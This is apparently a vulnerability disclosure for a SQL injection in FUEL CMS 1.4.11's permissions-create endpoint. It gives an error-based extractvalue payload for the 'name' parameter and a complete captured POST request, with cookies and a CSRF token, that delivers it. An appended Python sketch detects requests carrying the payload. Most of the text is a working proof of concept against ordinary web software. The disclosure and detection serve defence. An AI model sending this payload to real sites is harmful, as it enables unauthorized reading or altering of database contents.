fix: issue #575
25ff3dd
FUEL CMS 1.4.11 allows SQL Injection via parameter 'name' in /fuel/permissions/create/

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
payload:
a")or extractvalue(1,concat(0x23,user()))#
Poc:
POST /FUEL/fuel/permissions/create/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------3405189478671501608124578765
Content-Length: 2181
Origin: http://localhost
Connection: close
Referer: http://localhost/FUEL/fuel/permissions/create
Cookie: fuel_bar=%257B%2522show_fuel_bar%2522%253A%25220%2522%252C%2522show_editable_areas%2522%253A%25220%2522%257D; fuel_262c6342d4c36d3c073734c54972a54a=a%3A2%3A%7Bs%3A2%3A%22id%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22language%22%3Bs%3A7%3A%22english%22%3B%7D; fuel_ui_262c6342d4c36d3c073734c54972a54a=%257B%2522leftnav_h3%2522%253A%25220%257C0%257C0%257C0%2522%252C%2522tabs_assets_create%2522%253A%25221%2522%252C%2522tabs_assets_create_5a47396a63773d3d%2522%253A%25221%2522%252C%2522tabs_assets_create_5a47396a63773d3d%252522_alert%2522%253A%25220%2522%252C%2522fuel_navigation_items%2522%253A%2522list%2522%252C%2522tabs_navigation_create%2522%253A%25221%2522%252C%2522tabs_pages_select%2522%253A%25220%2522%252C%2522tabs_assets_create_615731685a32567a4c334e7a63334e7a63773d3d%2522%253A%25221%2522%252C%2522fuel_pages_items%2522%253A%2522list%2522%252C%2522tabs_pages_edit_1%2522%253A%25220%2522%252C%2522tabs_navigation_edit_1%2522%253A%25220%2522%252C%2522fuel_permissions_items%2522%253A%2522list%2522%257D; PHPSESSID=vi872kt7o20ir3pviar60bkrd4; ci_session=r5pfeo4dt6rptgrbv45fmen4rvsr3t5s
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
-----------------------------3405189478671501608124578765
Content-Disposition: form-data; name="description"
adsf
-----------------------------3405189478671501608124578765
Content-Disposition: form-data; name="name"
a")or extractvalue(1,concat(0x23,user()))#
-----------------------------3405189478671501608124578765
Content-Disposition: form-data; name="exists_users"
1
-----------------------------3405189478671501608124578765
Content-Disposition: form-data; name="other_perms[]"
create
-----------------------------3405189478671501608124578765
Content-Disposition: form-data; name="other_perms[]"
edit
-----------------------------3405189478671501608124578765
Content-Disposition: form-data; name="other_perms[]"
publish
-----------------------------3405189478671501608124578765
Content-Disposition: form-data; name="other_perms[]"
delete
-----------------------------3405189478671501608124578765
Content-Disposition: form-data; name="exists_other_perms"
1
-----------------------------3405189478671501608124578765
Content-Disposition: form-data; name="active"
yes
-----------------------------3405189478671501608124578765
Content-Disposition: form-data; name="id"
-----------------------------3405189478671501608124578765
Content-Disposition: form-data; name="fuel_module"
permissions
-----------------------------3405189478671501608124578765
Content-Disposition: form-data; name="fuel_module_uri"
permissions
-----------------------------3405189478671501608124578765
Content-Disposition: form-data; name="fuel_id"
-----------------------------3405189478671501608124578765
Content-Disposition: form-data; name="fuel_inline_action"
create
-----------------------------3405189478671501608124578765
Content-Disposition: form-data; name="fuel_inline"
0
-----------------------------3405189478671501608124578765
Content-Disposition: form-data; name="ci_csrf_token_FUEL"
d2417201849fd467eee1dcaf6bd4a294
-----------------------------3405189478671501608124578765
Content-Disposition: form-data; name="fuel_inline"
0
-----------------------------3405189478671501608124578765--
Burpsuite Response pic:
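
An added detection sketch, not part of the original issue or of FUEL CMS: it parses a multipart/form-data body shaped like the request above and flags form fields whose values show the traits of the reported payload. The rule names, the two-hit threshold and the trimmed sample body are assumptions of this example.

```python
import re
from email import message_from_bytes

# Heuristics taken from the payload shown in the issue; rule names are this example's own.
RULES = {
    "quote_breakout": re.compile(r"""["']\s*\)*\s*(?:or|and)\b""", re.I),
    "xpath_error_func": re.compile(r"\bextractvalue\s*\(", re.I),
    "hex_literal_concat": re.compile(r"\bconcat\s*\(\s*0x[0-9a-f]+", re.I),
    "trailing_comment": re.compile(r"(?:#|--\s)\s*$"),
}

def parse_form_fields(content_type: str, body: bytes):
    """Return (field name, value) pairs from a multipart/form-data body."""
    raw = b"Content-Type: " + content_type.encode() + b"\r\n\r\n" + body
    msg = message_from_bytes(raw)
    if not msg.is_multipart():
        return []
    fields = []
    for part in msg.get_payload():
        name = part.get_param("name", header="content-disposition")
        value = part.get_payload(decode=True) or b""
        fields.append((name, value.decode("utf-8", "replace")))
    return fields

def flag_fields(content_type: str, body: bytes, min_hits: int = 2):
    """Map field name -> matched rule names, for fields hitting >= min_hits rules."""
    findings = {}
    for name, value in parse_form_fields(content_type, body):
        hits = [rule for rule, rx in RULES.items() if rx.search(value)]
        if len(hits) >= min_hits:
            findings[name] = hits
    return findings

# Constructed sample: trimmed to three fields, shaped like the request in the issue.
SAMPLE_CT = "multipart/form-data; boundary=----demo"
SAMPLE_BODY = (
    b'------demo\r\nContent-Disposition: form-data; name="description"\r\n\r\nadsf\r\n'
    b'------demo\r\nContent-Disposition: form-data; name="name"\r\n\r\n'
    b'a")or extractvalue(1,concat(0x23,user()))#\r\n'
    b'------demo\r\nContent-Disposition: form-data; name="active"\r\n\r\nyes\r\n'
    b'------demo--\r\n'
)

if __name__ == "__main__":
    print(flag_fields(SAMPLE_CT, SAMPLE_BODY))
```

Requiring two independent hits keeps a value that merely ends in `#` from alerting on its own; such matching supplements, and does not replace, bound parameters in the query that handles `name`.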